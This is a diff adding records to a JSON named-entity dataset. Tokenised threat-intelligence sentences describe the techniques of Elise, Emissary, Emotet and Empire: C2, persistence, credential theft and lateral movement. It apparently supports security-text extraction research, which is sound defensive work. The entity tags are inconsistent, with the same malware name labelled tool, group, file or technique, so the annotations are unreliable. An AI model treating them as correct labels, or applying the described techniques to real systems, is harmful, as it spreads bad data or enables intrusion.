"O", + "O", + "O", + "I-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Elise", + "exfiltrates", + "data", + "using", + "cookie", + "values", + "that", + "are", + "Base64-encoded." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elise", + "encrypts", + "exfiltrated", + "data", + "with", + "RC4." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elise", + "executes", + "<code>systeminfo</code>", + "after", + "initial", + "communication", + "is", + "made", + "to", + "the", + "remote", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elise", + "executes", + "<code>ipconfig", + "/all</code>", + "after", + "initial", + "communication", + "is", + "made", + "to", + "the", + "remote", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elise", + "executes", + "<code>net", + "start</code>", + "after", + "initial", + "communication", + "is", + "made", + "to", + "the", + "remote", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elise", + "performs", + "timestomping", + "of", + "a", + "CAB", + "file", + "it", + "creates." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elise", + "communicates", + "over", + "HTTP", + "or", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Elise", + "configures", + "itself", + "as", + "a", + "service." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "variant", + "of", + "Emissary", + "appends", + "junk", + "data", + "to", + "the", + "end", + "of", + "its", + "DLL", + "file", + "to", + "create", + "a", + "large", + "file", + "that", + "may", + "exceed", + "the", + "maximum", + "size", + "that", + "anti-virus", + "programs", + "can", + "scan." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emissary", + "injects", + "its", + "DLL", + "file", + "into", + "a", + "newly", + "spawned", + "Internet", + "Explorer", + "process." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Variants", + "of", + "Emissary", + "encrypt", + "payloads", + "using", + "various", + "XOR", + "ciphers,", + "as", + "well", + "as", + "a", + "custom", + "algorithm", + "that", + "uses", + "the", + "\"srand\"", + "and", + "\"rand\"", + "functions." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emissary", + "has", + "the", + "capability", + "to", + "execute", + "<code>gpresult</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features" + ] + }, + { + "tokens": [ + "Emissary", + "has", + "the", + "capability", + "to", + "download", + "files", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emissary", + "has", + "the", + "capability", + "to", + "execute", + "the", + "command", + "<code>net", + "localgroup", + "administrators</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Variants", + "of", + "Emissary", + "have", + "added", + "Run", + "Registry", + "keys", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Variants", + "of", + "Emissary", + "have", + "used", + "rundll32.exe", + "in", + "Registry", + "values", + "added", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "C2", + "server", + "response", + "to", + "a", + "beacon", + "sent", + "by", + "a", + "variant", + "of", + "Emissary", + "contains", + "a", + "36-character", + "GUID", + "value", + "that", + "is", + "used", + "as", + "an", + "encryption", + "key", + "for", + "subsequent", + "network", + "communications.", + "Some", + "variants", + "of", + "Emissary", + "use", + "various", + "XOR", + "operations", + "to", + "encrypt", + "C2", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Emissary", + "has", + "the", + "capability", + "to", + "execute", + "ver", + "and", + "systeminfo", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emissary", + "has", + "the", + "capability", + "to", + "execute", + "the", + "command", + "<code>ipconfig", + "/all</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emissary", + "has", + "the", + "capability", + "to", + "execute", + "the", + "command", + "<code>net", + "start</code>", + "to", + "interact", + "with", + "services." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Emissary", + "uses", + "HTTP", + "or", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Emissary", + "has", + "the", + "capability", + "to", + "create", + "a", + "remote", + "shell", + "and", + "execute", + "specified", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Emissary", + "is", + "capable", + "of", + "configuring", + "itself", + "as", + "a", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "observed", + "encrypting", + "the", + "data", + "it", + "collects", + "before", + "sending", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "is", + "known", + "to", + "use", + "RSA", + "keys", + "for", + "encrypting", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "obfuscated", + "macros", + "within", + "malicious", + "documents", + "to", + "hide", + "the", + "URLs", + "hosting", + "the", + "malware,", + "CMD.exe", + "arguments,", + "and", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "observed", + "leveraging", + "a", + "module", + "that", + "retrieves", + "passwords", + "stored", + "on", + "a", + "system", + "for", + "the", + "current", + "logged-on", + "user." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "observed", + "dropping", + "browser", + "password", + "grabber", + "modules." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "used", + "a", + "self-extracting", + "RAR", + "file", + "to", + "deliver", + "modules", + "to", + "victims.", + "Emotet", + "has", + "also", + "extracted", + "embedded", + "executables", + "from", + "files", + "using", + "hard-coded", + "buffer", + "offsets." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "observed", + "injecting", + "in", + "to", + "Explorer.exe", + "and", + "other", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "observed", + "leveraging", + "a", + "module", + "that", + "can", + "scrape", + "email", + "addresses", + "from", + "Outlook." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "observed", + "leveraging", + "a", + "module", + "that", + "can", + "scrape", + "email", + "addresses", + "from", + "Outlook." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "dropped", + "an", + "embedded", + "executable", + "at", + "`%Temp%\\setup.exe`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "exfiltrated", + "data", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "seen", + "exploiting", + "SMB", + "via", + "a", + "vulnerability", + "exploit", + "like", + "EternalBlue", + "(MS17-010)", + "to", + "achieve", + "lateral", + "movement", + "and", + "propagation." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "observed", + "dropping", + "password", + "grabber", + "modules", + "including", + "Mimikatz." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "copied", + "itself", + "to", + "remote", + "systems", + "using", + "the", + "`service.exe`", + "filename." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "can", + "brute", + "force", + "a", + "local", + "admin", + "password,", + "then", + "use", + "it", + "to", + "facilitate", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "observed", + "leveraging", + "a", + "module", + "that", + "scrapes", + "email", + "data", + "from", + "Outlook." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "relied", + "upon", + "users", + "clicking", + "on", + "a", + "malicious", + "attachment", + "delivered", + "through", + "spearphishing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "relied", + "upon", + "users", + "clicking", + "on", + "a", + "malicious", + "link", + "delivered", + "through", + "spearphishing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "installed", + "itself", + "as", + "a", + "new", + "service", + "with", + "the", + "service", + "name", + "`Windows", + "Defender", + "System", + "Service`", + "and", + "display", + "name", + "`WinDefService`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "used", + "`CreateProcess`", + "to", + "create", + "a", + "new", + "process", + "to", + "run", + "its", + "executable", + "and", + "`WNetEnumResourceW`", + "to", + "enumerate", + "non-hidden", + "shares." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "enumerated", + "non-hidden", + "network", + "shares", + "using", + "`WNetEnumResourceW`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "observed", + "to", + "hook", + "network", + "APIs", + "to", + "monitor", + "network", + "traffic." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "used", + "HTTP", + "over", + "ports", + "such", + "as", + "20,", + "22,", + "443,", + "7080,", + "and", + "50000,", + "in", + "addition", + "to", + "using", + "ports", + "commonly", + "associated", + "with", + "HTTP/S." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "observed", + "using", + "a", + "hard", + "coded", + "list", + "of", + "passwords", + "to", + "brute", + "force", + "user", + "accounts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "used", + "Powershell", + "to", + "retrieve", + "the", + "malicious", + "payload", + "and", + "download", + "additional", + "resources", + "like", + "Mimikatz." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "observed", + "enumerating", + "local", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "reflectively", + "loaded", + "payloads", + "into", + "memory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "observed", + "adding", + "the", + "downloaded", + "payload", + "to", + "the", + "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "key", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "leveraged", + "the", + "Admin$,", + "C$,", + "and", + "IPC$", + "shares", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "maintained", + "persistence", + "through", + "a", + "scheduled", + "task." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "used", + "custom", + "packers", + "to", + "protect", + "its", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "delivered", + "by", + "phishing", + "emails", + "containing", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "delivered", + "by", + "phishing", + "emails", + "containing", + "links." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "used", + "Google’s", + "Protobufs", + "to", + "serialize", + "data", + "sent", + "to", + "and", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "enumerated", + "all", + "users", + "connected", + "to", + "network", + "shares." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "the", + "ability", + "to", + "duplicate", + "the", + "user’s", + "token." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "sent", + "Microsoft", + "Word", + "documents", + "with", + "embedded", + "macros", + "that", + "will", + "invoke", + "scripts", + "to", + "download", + "additional", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "used", + "HTTP", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "can", + "extract", + "names", + "of", + "all", + "locally", + "reachable", + "Wi-Fi", + "networks", + "and", + "then", + "perform", + "a", + "brute-force", + "attack", + "to", + "spread", + "to", + "new", + "networks." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "used", + "cmd.exe", + "to", + "run", + "a", + "PowerShell", + "script." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "used", + "WMI", + "to", + "execute", + "powershell.exe." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Emotet", + "has", + "been", + "observed", + "creating", + "new", + "services", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "PowerSploit's", + "<code>Invoke-TokenManipulation</code>", + "to", + "manipulate", + "access", + "tokens." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "leverage", + "WMI", + "debugging", + "to", + "remotely", + "replace", + "binaries", + "like", + "sethc.exe,", + "Utilman.exe,", + "and", + "Magnify.exe", + "with", + "cmd.exe." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Empire", + "can", + "ZIP", + "directories", + "on", + "the", + "target", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "TLS", + "to", + "encrypt", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "automatically", + "gather", + "the", + "username,", + "domain", + "name,", + "machine", + "name,", + "and", + "other", + "information", + "from", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "has", + "the", + "ability", + "to", + "automatically", + "send", + "collected", + "data", + "back", + "to", + "the", + "threat", + "actors'", + "C2." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "Dropbox", + "and", + "GitHub", + "for", + "C2." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "has", + "the", + "ability", + "to", + "gather", + "browser", + "data", + "such", + "as", + "bookmarks", + "and", + "visited", + "sites." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "includes", + "various", + "modules", + "to", + "attempt", + "to", + "bypass", + "UAC", + "for", + "escalation", + "of", + "privileges." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "harvest", + "clipboard", + "data", + "on", + "both", + "Windows", + "and", + "macOS", + "systems." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "has", + "the", + "ability", + "to", + "obfuscate", + "commands", + "using", + "<code>Invoke-Obfuscation</code>." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Empire", + "uses", + "a", + "command-line", + "interface", + "to", + "interact", + "with", + "systems." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "<code>Invoke-RunAs</code>", + "to", + "make", + "tokens." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "contains", + "some", + "modules", + "that", + "leverage", + "API", + "hooking", + "to", + "carry", + "out", + "tasks,", + "such", + "as", + "netripper." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "various", + "modules", + "to", + "search", + "for", + "files", + "containing", + "passwords." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "modules", + "that", + "extract", + "passwords", + "from", + "common", + "web", + "browsers", + "such", + "as", + "Firefox", + "and", + "Chrome." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Empire", + "contains", + "modules", + "that", + "can", + "discover", + "and", + "exploit", + "various", + "DLL", + "hijacking", + "opportunities." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "utilize", + "<code>Invoke-DCOM</code>", + "to", + "leverage", + "remote", + "COM", + "execution", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "acquire", + "local", + "and", + "domain", + "user", + "account", + "information." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "has", + "a", + "module", + "for", + "creating", + "a", + "new", + "domain", + "user", + "if", + "permissions", + "allow." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Features", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "has", + "modules", + "for", + "enumerating", + "domain", + "trusts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "has", + "a", + "dylib", + "hijacker", + "module", + "that", + "generates", + "a", + "malicious", + "dylib", + "given", + "the", + "path", + "to", + "a", + "legitimate", + "dylib", + "of", + "a", + "vulnerable", + "application." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "send", + "data", + "gathered", + "from", + "a", + "target", + "through", + "the", + "command", + "and", + "control", + "channel." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "Dropbox", + "for", + "data", + "exfiltration." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "GitHub", + "for", + "data", + "exfiltration." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "exploit", + "vulnerabilities", + "such", + "as", + "MS16-032", + "and", + "MS16-135." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Empire", + "has", + "a", + "limited", + "number", + "of", + "built-in", + "modules", + "for", + "exploiting", + "remote", + "SMB,", + "JBoss,", + "and", + "Jenkins", + "servers." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Empire", + "includes", + "various", + "modules", + "for", + "finding", + "files", + "of", + "interest", + "on", + "hosts", + "and", + "network", + "shares." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "leverage", + "its", + "implementation", + "of", + "Mimikatz", + "to", + "obtain", + "and", + "use", + "golden", + "tickets." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "includes", + "various", + "modules", + "for", + "enumerating", + "Group", + "Policy." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "use", + "<code>New-GPOImmediateTask</code>", + "to", + "modify", + "a", + "GPO", + "that", + "will", + "install", + "and", + "execute", + "a", + "malicious", + "Scheduled", + "Task/Job." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "can", + "upload", + "and", + "download", + "to", + "and", + "from", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Empire", + "uses", + "PowerSploit's", + "<code>Invoke-Kerberoast</code>", + "to", + "request", + "service", + "tickets", + "and", + "return", + "crackable", + "ticket", + "hashes." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", 